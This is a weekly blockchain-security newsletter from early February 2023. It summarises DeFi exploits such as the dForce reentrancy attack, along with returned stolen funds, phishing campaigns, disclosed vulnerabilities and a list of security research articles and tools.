BlockThreat - Week 6, 2023
dForce | CoW Swap | SushiSwap | SperaxUSD | NameCheap | Bitzlato
More than $5.4M were stolen from various DeFi projects this week. dForce Network was hit particularly hard with a relatively new read-only reentrancy exploit. On the bright side, web3 sleuths got a lot better at identifying attackers and forcing these “whitehats” to return stolen assets. Both dForce and SperaxUSD from last week got their stolen assets back! Attackers seemed to have written an auto-pwner for a few common vulnerabilities which is currently wreaking havoc on BNB Chain.
In other news, one of Bitzlato exchange’s founders was detained in Russia and
congratulated quickly released. Wormhole attackers are going full degen and leveraging up with liquid staked ETH.
Webaverse got hit with a mysterious social engineering attack which stole private keys along with $4M in USDC by taking a picture of a Trust Wallet balances.
Stay safe out there and avoid meeting with unknown investors in hotel lobbies. Let’s dive into the news, but first some wild stats on last years exploits from our friends at Chainalysis that hopefully inspire you to join to the good fight!
2022: The Biggest Year EVER(!) for Crypto Hacking
Last year, $3.8 billion was stolen from crypto hacking, primarily from DeFi protocols and by North Korea-linked attackers. Hacking activity ebbed and flowed throughout the year, with huge spikes in March and October, the latter of which became the biggest single month ever for cryptocurrency hacking with $775.7 million stolen in 32 separate attacks.
What platforms were most affected? What role did North Korea-linked hackers play?
Get the latest on crypto hacking in 2022 now >
Bitzlato Co-Founder Released After Arrest in Moscow, Pledges Relaunch of Seized Exchange.
SperaxUSD attackers returned stolen funds after they were identified.
dForce attacker voluntarily returned all of the stolen assets after their Singapore-based IP address was shared with authorities.
Wormhole Bridge Exploiter Supplies $46M to Crypto Lending Platform Maker, Buys Wrapped Ether.
Reports of attackers auto-hacking projects with weak deflationary token and price oracle handling on BSC and ETH chains.
NameCheap's email hacked to send Metamask, DHL phishing emails.
Crypto project Webaverse hacked for $4M in a hotel lobby. This was not the first time the gang hit crypto entrepreneurs.
Analysis of Monkey Drainer NFT Phishing Group by SlowMist.
Crypto phishing campaign exploits Twitter’s content preview flaw by SlowMist.
On February 7, 2023 LianGo lost $1.62M due to private key theft.
On February 7, 2023 CoW Swap Protocol was relieved of $166K after a combination of malicious contract approval and a lack of function access controls allowed attackers to drained all approved tokens.
On February 9, 2023 SushiSwap BentoBoxV1 was targeted in a price oracle manipulation attack which resulted in a $26K loss.
On February 9, 2023 dForce Network lost $3.65M after it was exploited with a read-only reentrancy vulnerability. Stolen assets were returned after the attacked was identified.
Infinite minting vulnerability discovered in BNB Chain and disclosed through responsible disclosure process by Felix Wilhelm, Jump Crypto.
Critical vulnerability discovered in OneKey hardware wallet which allows one to recover the stored mnemonic key.
DookeyDash exploitation and botting.
Fuzzing Solidity/Ethereum Smart Contract using Foundry/Forge by Patrick Ventuzelo.
$1mln - Generating ETH from thin air - Aurora rainbow bridge withdrawal logic bug.
0xleastwood: Spearbit Lead Security Researcher talks Web3 Security and Smart Contract Auditing by Andy Li.
DeGatchi on Reverse Engineering and MEV - Devs Do Something 26.
Analyzing transactions on Sinbad BTC tumbler used by North Korean attackers by ErgoBTC.
I See Dead Code - What if I told you that over one-third of recently-deployed Ethereum smart contracts consist mostly of unusable junk? by Sifis Lagouvardos (Dedaub)
OnChain Transaction Debugging - Lesson 6: Write Your Own PoC (Reentrancy) by DeFiHackLabs.
Breaking Fluidity for glory and $50K by Trust in Distrust.
First Deposit Bug in CompoundV2 by Akshay Srivastav.
How to hack into NFT marketplace by Alex Horlan, Hacken Proof.
Balancer Logic Error Bugfix Review by Immunefi.
How to Submit Bug Reports That Get Paid by Immunefi.
Lesson 1: Smart Contract Audit Methodology & Tips by SunWeb3Sec.
Modular MEV; Part 1—The Introduction by Maven11.
A beginner's intro to coding zero-knowledge proofs by Santiago Palladino.
Symbolic testing with Halmos: Leveraging existing tests for formal verification by Daejun Park, a16z.
Solidity Coverage in VS Code with Foundry by Devan Non.
Querying internal smart contract parameters with Foundry by Apoorv Lathey.
ABI Tools - Transaction calldata decoder by samczsun.
Bytegraph - Smart-Contract Analysis Tool.
Erigon-DB - Fully typed access to the Erigon database in rust.
vEVM - on-chain gasless arbitrary bytecode execution engine.
Enjoy reading BlockThreat? Consider sponsoring the next edition or becoming a paid subscriber to unlock the premium section with indicators, special reports, and searchable newsletter archives.
Keep reading with a 7-day free trial
Subscribe to Blockchain Threat Intelligence to keep reading this post and get 7 days of free access to the full post archives.